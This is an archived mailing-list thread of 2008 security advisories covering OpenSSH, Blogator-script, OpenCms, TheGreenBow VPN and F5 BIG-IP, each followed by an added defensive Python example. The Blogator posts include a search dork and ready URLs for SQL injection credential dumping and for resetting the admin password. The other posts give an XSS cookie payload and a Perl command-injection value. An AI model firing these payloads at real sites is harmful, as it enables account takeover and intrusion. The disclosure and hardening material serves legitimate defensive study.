[ GLSA 200804-03 ] OpenSSH: Privilege escalation

2008-04-05 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: OpenSSH: Privilege escalation
  Date: April 05, 2008
  Bugs: #214985, #215702
ID: 200804-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two flaws have been discovered in OpenSSH which could allow local
attackers to escalate their privileges.

Background
==========

OpenSSH is a complete SSH protocol implementation that includes an SFTP
client and server support.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/openssh       < 4.7_p1-r6                   >= 4.7_p1-r6

Description
===========

Two issues have been discovered in OpenSSH:

* Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY
  variable in SSH sessions using X11 forwarding even when it cannot
  bind the X11 server to a local port in all address families
  (CVE-2008-1483).

* OpenSSH will execute the contents of the ".ssh/rc" file even when
  the "ForceCommand" directive is enabled in the global sshd_config
  (CVE-2008-1657).

Impact
======

A local attacker could exploit the first vulnerability to hijack
forwarded X11 sessions of other users and possibly execute code with
their privileges, disclose sensitive data or cause a Denial of Service,
by binding a local X11 server to a port using only one address family.
The second vulnerability might allow local attackers to bypass intended
security restrictions and execute commands other than those specified
by "ForceCommand" if they are able to write to their home directory.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSH users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6"

References
==========

  [ 1 ] CVE-2008-1483
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483
  [ 2 ] CVE-2008-1657
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
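An added example, not part of the GLSA and not OpenSSH code, that locates the exposure the two CVEs describe on a Gentoo host that has not yet been upgraded: it parses sshd_config for the scopes in which ForceCommand is set and for X11Forwarding, and lists users whose ~/.ssh/rc exists (the file that CVE-2008-1657 lets run despite ForceCommand). The sample config, the user names and the home directories are constructed for the demo; the fix itself remains the emerge upgrade above.

```python
import os
import re
import tempfile

# Constructed sshd_config sample (an assumption for the demo, not from the advisory).
SAMPLE_SSHD_CONFIG = """\
# sshd_config (constructed sample)
X11Forwarding yes
ForceCommand /usr/local/bin/restricted-shell
Match Group sftponly
    ForceCommand internal-sftp
"""


def parse_sshd_config(text):
    """Split sshd_config into global options and Match blocks.

    sshd keywords are case-insensitive; values are kept verbatim.
    Returns (global_opts, [(match_criteria, opts), ...]).
    """
    global_opts, blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ""
        if key == "match":
            current = {}
            blocks.append((value, current))
        elif current is None:
            global_opts[key] = value
        else:
            current[key] = value
    return global_opts, blocks


def force_command_scopes(text):
    """Every scope (global or a Match block) in which ForceCommand is set."""
    global_opts, blocks = parse_sshd_config(text)
    scopes = []
    if "forcecommand" in global_opts:
        scopes.append(("global", global_opts["forcecommand"]))
    for criteria, opts in blocks:
        if "forcecommand" in opts:
            scopes.append((criteria, opts["forcecommand"]))
    return scopes


def rc_files_present(homes):
    """homes maps user -> home directory; return [(user, path)] for every ~/.ssh/rc found."""
    found = []
    for user, home in homes.items():
        path = os.path.join(home, ".ssh", "rc")
        if os.path.isfile(path):
            found.append((user, path))
    return found


def audit(text, homes):
    """Findings to review before the upgrade lands; the fix itself is the upgrade."""
    findings = []
    scopes = force_command_scopes(text)
    if scopes:
        where = ", ".join(scope for scope, _ in scopes)
        for user, path in rc_files_present(homes):
            findings.append(f"{user}: {path} exists while ForceCommand is set in {where}")
    global_opts, _ = parse_sshd_config(text)
    if global_opts.get("x11forwarding", "no").lower() == "yes":
        findings.append("X11Forwarding yes: forwarded X11 sessions are exposed until openssh >= 4.7_p1-r6")
    return findings


def demo():
    """Constructed home directories: alice has ~/.ssh/rc, bob does not."""
    root = tempfile.mkdtemp()
    homes = {user: os.path.join(root, user) for user in ("alice", "bob")}
    for home in homes.values():
        os.makedirs(os.path.join(home, ".ssh"))
    with open(os.path.join(homes["alice"], ".ssh", "rc"), "w") as fh:
        fh.write("# constructed ~/.ssh/rc\n")
    return audit(SAMPLE_SSHD_CONFIG, homes)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, feed `audit()` the contents of /etc/ssh/sshd_config and a user-to-home map built from the passwd database; a ForceCommand scope with no ~/.ssh/rc anywhere means CVE-2008-1657 has nothing to run, while any X11Forwarding yes keeps CVE-2008-1483 in play until the upgrade.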




Blogator-script 0.95 SQL Injection Vulnerability

2008-04-05 Thread hadihadi_zedehal_2006


 


#...: Blogator-script 0.95 SQL Injection Vulnerability

 



Virangar Security Team


www.virangar.org

www.virangar.net




Discovered By: virangar security team (hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

---

dork: inurl:/_blogadata/

---

vuln code in /_blogadata/include/sond_result.php:

line 27: $id_art=$_GET['id_art'];

..

line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM 
sondage_rep WHERE id_sond = $id_art ORDER BY ordre");



vuln:

http://www.site.com/_blogadata/include/sond_result.php?id_art=-9/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*



you can see in Blogator-script other injection bugs too ;)


Alkacon OpenCms sessions.jsp searchfilter XSS

2008-04-05 Thread nnposter
Alkacon OpenCms sessions.jsp searchfilter XSS



Product: Alkacon OpenCms 

http://www.opencms.org/



OpenCms contains a cross-site scripting vulnerability in the active session 
reporting function. Input to parameter searchfilter in page 
opencms/system/workplace/admin/workplace/sessions.jsp is not sufficiently 
validated and/or sanitized before it gets embedded in the resulting web page.


Example:

http://(target)/opencms/system/workplace/admin/workplace/sessions.jsp?
ispopup=&action=listsearch&framename=&title=
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace
&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=
&formname=ls-form&sortcol=&originalparams=&page=&style=new&root=
&path=%252Fworkplace%252Fbroadcast&redirect=
&searchfilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
&listSearchFilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E



The vulnerability has been identified in version 7.0.3. However, other versions 
may also be affected. Despite similarities this is a different vulnerability 
than CVE-2008-1510.



Solution:

Users should not browse untrusted sites while logged into OpenCms.



Found by:

nnposter



Blogator-script 0.95 Change User Password Vulnerability

2008-04-05 Thread hadihadi_zedehal_2006


 
#...: Blogator-script 0.95 Change User Password Vulnerability


Virangar Security Team


www.virangar.org

www.virangar.net




Discovered By: virangar security team (hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

---

dork: inurl:/_blogadata/

---

vuln code in /_blogadata/include/init_pass2.php:

line 23: $id=$_GET['a'];

line 24:$email=$_GET['b'];

line 25: $mdp=$_GET['c'];

.

line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE 
id_membre = '$id' AND email LIKE '$email' LIMIT 1");


So if we put the user id for $id, put % (any) for the user email ($email), and 
$mdp=newpassword... he he he :)



vuln:

http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%

example:(change admin pass to 123456)

http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%
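The two Blogator posts above quote the same defect in two files: request input pasted straight into the SQL text, and in init_pass2.php a LIKE comparison that a bare % turns into match-anything, with no proof that the caller owns the account. Added example, not Blogator's code: the two quoted queries re-created against an in-memory SQLite database beside a hardened form (integer cast plus bound parameters for sond_result.php; bound parameters, exact match on email and a hypothetical reset-token check for init_pass2.php). Table and column names come from the posts; the rows, the reset_token column, the PBKDF2 hashing and the whole token flow are assumptions for the demo. LIMIT 1 is dropped from the UPDATE because SQLite does not accept it there by default.

```python
import hashlib
import hmac
import secrets
import sqlite3


def make_db():
    """In-memory stand-in for the Blogator tables named in the posts; rows are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE membre (id_membre INTEGER PRIMARY KEY, pseudo TEXT, pass TEXT,
                             email TEXT, reset_token TEXT);
        CREATE TABLE sondage_rep (id_sond INTEGER, sond_rep TEXT, votes_H INTEGER,
                                  votes_F INTEGER, ordre INTEGER);
        INSERT INTO membre VALUES (1, 'admin', 'old-hash', 'admin@example.invalid', NULL);
        INSERT INTO membre VALUES (2, 'bob',   'old-hash', 'bob@example.invalid',   NULL);
        INSERT INTO sondage_rep VALUES (1, 'yes', 3, 4, 1), (1, 'no', 1, 2, 2), (2, 'maybe', 0, 0, 1);
    """)
    return db


# sond_result.php line 34 as quoted: $id_art is pasted into the SQL text.
def poll_results_vulnerable(db, id_art):
    sql = f"SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = {id_art} ORDER BY ordre"
    return db.execute(sql).fetchall()


def poll_results_hardened(db, id_art):
    id_art = int(id_art)   # raises ValueError for anything that is not an integer
    return db.execute(
        "SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = ? ORDER BY ordre",
        (id_art,)).fetchall()


def hardened_rejects(db, id_art):
    """True when the hardened query refuses the input instead of running it."""
    try:
        poll_results_hardened(db, id_art)
    except ValueError:
        return True
    return False


# init_pass2.php line 27 as quoted (LIMIT 1 dropped: SQLite rejects it on UPDATE by default).
def change_password_vulnerable(db, user_id, email, mdp):
    sql = (f"UPDATE membre SET pass = '{mdp}' WHERE id_membre = '{user_id}' "
           f"AND email LIKE '{email}'")
    return db.execute(sql).rowcount


def _hash(secret, salt=None):
    """Salted PBKDF2, used both for the stored password and for the reset token."""
    salt = salt or secrets.token_hex(8)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt.encode(), 100_000).hex()
    return f"{salt}${digest}"


def issue_reset_token(db, email):
    """Hypothetical reset flow (assumption, not Blogator's): a random token is sent to
    exactly this address and only its hash is stored."""
    token = secrets.token_urlsafe(32)
    db.execute("UPDATE membre SET reset_token = ? WHERE email = ?", (_hash(token), email))
    return token


def change_password_hardened(db, user_id, email, mdp, token):
    """Bound parameters, exact match on email (no LIKE wildcards), gated on the token."""
    row = db.execute("SELECT reset_token FROM membre WHERE id_membre = ? AND email = ?",
                     (int(user_id), email)).fetchone()
    if row is None or row[0] is None:
        return 0
    salt = row[0].split("$", 1)[0]
    if not hmac.compare_digest(row[0], _hash(token, salt)):
        return 0
    return db.execute(
        "UPDATE membre SET pass = ?, reset_token = NULL WHERE id_membre = ? AND email = ?",
        (_hash(mdp), int(user_id), email)).rowcount


def password_of(db, user_id):
    return db.execute("SELECT pass FROM membre WHERE id_membre = ?", (user_id,)).fetchone()[0]
```

Run against `make_db()`: the quoted UPDATE with `%` as the email rewrites the admin password for anyone who knows the id, while the hardened version does nothing without a token issued to that exact address, and even then stores only a salted hash. The integer cast in `poll_results_hardened` is what makes `id_art` data rather than SQL.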




TheGreenBowVPN, Login Credentials Disclosure

2008-04-05 Thread evilcry
Hi there,


###

TheGreenBow IPSec VPN Client Login Credentials Information Disclosure Vulnerability



Information

Risk: Low

Typology: Local

Date: 30/03/2008

Product: TheGreenBow IPSec VPN Client

Version:  4.10.010

Vendor: http://www.thegreenbow.com/vpn.html

Vendor Status: 29/03/2008 – Vendor Informed

   30/03/2008 - Reply from The Vendor

   31/03/200/ - Patch Released

Discovered By: Giuseppe `Evilcry` Bonfa'



Description


TheGreenBow IPSec VPN Client is an on demand IPSec VPN Client, compliant with 
most popular VPN gateways and with network tools to deploy security in large 
and medium enterprises. Highly efficient and easy to configure, the IPSec VPN 
Client also allows peer-to-peer VPN. 



PoC


TheGreenBow IPSec VPN Client 4.10.010 is prone to a Login Credentials Disclosure 
that could expose local users of TheGreenBow to a leak of Sensitive Information; 
specifically, an attacker could carve Login and Certificates used by the user, 
because they are stored in clear in memory. This may lead to complete User 
Impersonation.


Attackers can exploit this issue to harvest VPN login credentials and gain 
unauthorized access to networks and resources protected by the VPN.


All information is stored in the memory image of the process 'Tgbike.exe', 
so a basic Process Memory Dumper is enough.


So we can identify some keywords to use for Credentials Carving:




Xuser = “”

Xpassword = “”

#  CERTIFICATES 

-Client-Private-Key]


#


A PDF version of the Advisory is available here:

http://evilcry.altervista.org/tuts/theGreenBow.pdf


Regards,

Giuseppe 'Evilcry' Bonfa'
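Added example, not TheGreenBow's code: the mitigation for what the advisory describes, a credential held in a mutable buffer that is zeroed as soon as the client has used it, with the secret consumed through a memoryview so no immutable copy is left behind for a memory dumper to find. The marker strings are the ones listed above; the memory image is constructed for the demo, and the SHA-256 stands in for whatever the client actually derives from the password.

```python
import hashlib
import re

# The markers the advisory lists as preceding the plaintext fields in the process image.
MARKERS = (b'Xuser = "', b'Xpassword = "')

# Constructed stand-in for a dumped region of memory (not a real Tgbike.exe image).
FAKE_IMAGE = (b'[Profile]\r\nXuser = "alice"\r\nXpassword = "hunter2"\r\n'
              b'[Certificates]\r\n')


def plaintext_markers(image, markers=MARKERS):
    """Which of the markers can be found in a memory region (bytes or bytearray)."""
    return [m for m in markers if m in image]


def scrub(buf):
    """Overwrite a bytearray in place; str and bytes are immutable and cannot be wiped."""
    for i in range(len(buf)):
        buf[i] = 0


class SecretBuffer:
    """Holds a credential in a mutable buffer that is zeroed when the block exits,
    so the secret is not resident for the lifetime of the client process."""

    def __init__(self, data):
        self.buf = bytearray(data)

    def __enter__(self):
        return self.buf

    def __exit__(self, *exc):
        scrub(self.buf)
        return False


def password_fingerprint(buf):
    """Use the password without copying it: locate it with a regex over the bytearray
    and hash a memoryview slice, so no immutable copy of the secret is created."""
    m = re.search(rb'Xpassword = "([^"]*)"', buf)
    if m is None:
        return None
    view = memoryview(buf)[m.start(1):m.end(1)]
    return hashlib.sha256(view).hexdigest()


def demo():
    """Markers visible while the credential is in use, gone once the buffer is scrubbed."""
    with SecretBuffer(FAKE_IMAGE) as buf:
        before = plaintext_markers(buf)
        fingerprint = password_fingerprint(buf)
    after = plaintext_markers(buf)      # same object, now all zero bytes
    return before, after, fingerprint, buf


if __name__ == "__main__":
    before, after, fingerprint, _ = demo()
    print("markers before scrub:", before)
    print("markers after scrub: ", after)
```

The limiting factor is copies: every `bytes(buf)`, `.group(1)` or `str` conversion produces an immutable object the scrub cannot reach, so the design goal is to keep the credential in one mutable buffer, hand out views rather than copies, and zero it the moment the negotiation no longer needs it.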


F5 BIG-IP Management Interface Perl Injection

2008-04-05 Thread nnposter
F5 BIG-IP Management Interface Perl Injection



Product: F5 BIG-IP

http://www.f5.com/products/big-ip/



The F5 BIG-IP reconfiguration facility, used by both the web management 
interface and the CLI, suffers from insufficient input validation and/or 
sanitization of certain reconfiguration requests. It is possible for a 
logged-in user with Resource Manager or Administrator privileges to inject 
arbitrary Perl code, including spawning Unix shell commands, that gets 
immediately executed with root privileges. (For the Administrator role this 
does not provide any new privileges because it is already provided with full 
shell access as root.)


The core of the problem is using Perl EP3 with templates containing 
substitutions similar to

$val='NEW_VALUE';

without first escaping single quotes in NEW_VALUE.


As an example, the SNMP community string configuration accepts the following 
value as an allowed source of SNMP requests:


"none'.`touch /etc/foo`.'"


It is possible to craft URL links that would inject the code with a simple HTTP 
GET request. Cross-site attacks may leverage this vulnerability to make an 
arbitrary change to the BIG-IP appliance.



The vulnerability has been identified in version 9.4.3. However, other versions 
may also be affected.



Found by:

nnposter
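Both nnposter posts above are the same class of defect seen at two sinks: a value placed into code (a Perl single-quoted literal in the BIG-IP templates, a string inside a <script> block in OpenCms sessions.jsp) without escaping for that sink's grammar. Added example, not code from either vendor: an encoder for each sink, a small reader for Perl single-quoted literals that shows where the unescaped value ends and the injected code begins, and a round-trip check that the escaped value survives as data. The two values are the ones quoted in the posts (the OpenCms one URL-decoded); the `$val=` template line and the `var filter =` JavaScript line are assumptions.

```python
import json
from urllib.parse import unquote


# --- F5 BIG-IP post: a value pasted into a Perl single-quoted literal ---

def perl_single_quoted(value):
    """Render value as a Perl single-quoted literal, where only backslash and ' are special."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def parse_perl_single_quoted(src):
    """Parse one single-quoted literal at the start of src; return (value, remaining text)."""
    if not src.startswith("'"):
        raise ValueError("expected opening quote")
    out, i = [], 1
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            out.append(src[i + 1])      # \\ and \' are the only escapes in this grammar
            i += 2
        elif ch == "'":
            return "".join(out), src[i + 1:]
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated literal")


def render_unsafe(value):
    """The template pattern the post describes: $val='NEW_VALUE'; with no escaping."""
    return f"$val='{value}';"


def render_safe(value):
    return f"$val={perl_single_quoted(value)};"


def literal_and_rest(statement):
    """Split "$val=<literal><rest>" the way Perl would read it; rest should be just ';'.
    Anything else in rest is code that arrived inside NEW_VALUE."""
    value, rest = parse_perl_single_quoted(statement[len("$val="):])
    return value, rest


# --- OpenCms post: a value reflected inside a <script> block ---

def js_string_literal(value):
    """A JSON string is a valid JS string literal; additionally break '</' so the HTML
    parser cannot see a '</script>' inside the script element."""
    return json.dumps(value).replace("</", "<\\/")


def closes_script_block(fragment):
    return "</script" in fragment.lower()


def js_round_trips(value):
    """The encoded literal still decodes to exactly the original value."""
    return json.loads(js_string_literal(value)) == value


# The two values quoted in the posts (the OpenCms one URL-decoded).
PERL_PAYLOAD = "none'.`touch /etc/foo`.'"
XSS_PAYLOAD = unquote("%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E")


if __name__ == "__main__":
    print(render_unsafe(PERL_PAYLOAD), "->", literal_and_rest(render_unsafe(PERL_PAYLOAD)))
    print(render_safe(PERL_PAYLOAD), "->", literal_and_rest(render_safe(PERL_PAYLOAD)))
    print("var filter = " + js_string_literal(XSS_PAYLOAD) + ";")
```

With the unescaped template the reader returns the value `none` and a remainder that is the rest of the quoted payload, which is exactly what Perl would go on to evaluate; with the escaped template the value comes back whole and the remainder is only the closing `;`. The same discipline applies to the OpenCms sink: HTML-escaping alone is not enough inside a <script> block, because the HTML parser ends the element at the first `</script>` regardless of JavaScript quoting, so the `</` sequence has to be broken as well.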